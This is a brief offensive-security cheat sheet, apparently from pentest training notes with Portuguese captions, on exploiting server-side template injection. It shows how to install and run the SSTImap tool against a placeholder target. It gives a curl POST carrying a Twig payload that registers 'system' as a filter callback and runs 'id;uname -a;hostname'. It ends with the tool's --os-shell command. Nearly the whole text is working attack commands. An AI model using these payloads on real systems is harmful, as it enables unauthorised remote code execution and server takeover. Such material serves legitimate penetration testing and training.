SSTI Exploitation Example 1
git clone https://github.com/vladko312/SSTImap.git
Clonando o repositório sstimap
cd sstimap
Navegando para o novo diretório
pip install -r requirements.txt
Instalando dependências
./sstimap.py -u 'http://<TARGET IP>:<PORT>' -d name=john
Executando tplmap no destino
cURL - Interagindo com o alvo
curl -X POST -d 'name={{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("id;uname -a;hostname")}}' http://<TARGET IP>:<PORT>sstimap.py - OS Shell
./sstimap.py -u 'http://<TARGET IP>:<PORT>' -d name=john --os-shellLast updated